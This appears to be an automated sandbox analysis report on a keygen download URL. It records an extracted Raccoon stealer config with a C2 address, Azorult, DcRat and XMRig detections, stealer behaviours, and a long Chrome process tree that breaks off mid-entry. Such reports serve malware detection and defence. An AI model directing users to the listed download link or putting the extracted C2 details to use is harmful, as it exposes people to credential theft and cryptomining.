Analysis

  • max time kernel
    1792s
  • max time network
    1798s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-04-2021 17:27

General

  • Target

    https://keygenit.com/d/3563ee088d1n7s312q6.html

  • Sample

    210418-bdbbr7kjy2

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2424
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2460
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2688
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2768
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2660
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/3563ee088d1n7s312q6.html
            1⤵
            • Enumerates system info in registry
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:796
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffae3714f50,0x7ffae3714f60,0x7ffae3714f70
              2⤵
                PID:2288
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1600 /prefetch:2
                2⤵
                  PID:420
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1648 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2872
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:8
                  2⤵
                    PID:3700
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
                    2⤵
                      PID:1352
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
                      2⤵
                        PID:2084
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                        2⤵
                          PID:2212
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
                          2⤵
                            PID:3772
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
                            2⤵
                              PID:3044
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
                              2⤵
                                PID:1860
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:8
                                2⤵
                                  PID:4252
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4424
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:8
                                  2⤵
                                    PID:4628
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6648 /prefetch:8
                                    2⤵
                                      PID:4688
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6804 /prefetch:8
                                      2⤵
                                        PID:4708
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6940 /prefetch:8
                                        2⤵
                                          PID:4768
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6812 /prefetch:8
                                          2⤵
                                            PID:4804
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
                                            2⤵
                                              PID:4816
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:8
                                              2⤵
                                                PID:4852
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6936 /prefetch:8
                                                2⤵
                                                  PID:4912
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8
                                                  2⤵
                                                    PID:4924
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8
                                                    2⤵
                                                      PID:4984
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                      2⤵
                                                        PID:5020
                                                        • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                          "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7a7fda890,0x7ff7a7fda8a0,0x7ff7a7fda8b0
                                                          3⤵
                                                            PID:5040
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6896 /prefetch:8
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5096
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:8
                                                          2⤵
                                                            PID:5108
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
                                                            2⤵
                                                              PID:4204
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5264 /prefetch:8
                                                              2⤵
                                                                PID:928
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:8
                                                                2⤵
                                                                  PID:4276
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:8
                                                                  2⤵
                                                                    PID:4344
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7048 /prefetch:8
                                                                    2⤵
                                                                      PID:4488
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7068 /prefetch:8
                                                                      2⤵
                                                                        PID:4472
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7112 /prefetch:8
                                                                        2⤵
                                                                          PID:4464
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:8
                                                                          2⤵
                                                                            PID:1160
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:8
                                                                            2⤵
                                                                              PID:1152
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7132 /prefetch:8
                                                                              2⤵
                                                                                PID:4720
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:8
                                                                                2⤵
                                                                                  PID:4760
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7420 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4800
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7424 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4860
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7432 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4892
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4804
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3960 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4992
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3984 /prefetch:8
                                                                                            2⤵
                                                                                              PID:5028
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3992 /prefetch:8
                                                                                              2⤵
                                                                                                PID:5000
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4612
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4920
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3848 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4348
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6740 /prefetch:8
                                                                                                      2⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:4396
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4756
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7076 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4476
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6664 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:4424
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7264 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4172
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7636 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:4264
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4636
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:3844
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:4176
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4172 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4312
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7616 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4712
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:1568
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:1460
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:4924
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:1104
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=924 /prefetch:2
                                                                                                                            2⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4892
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
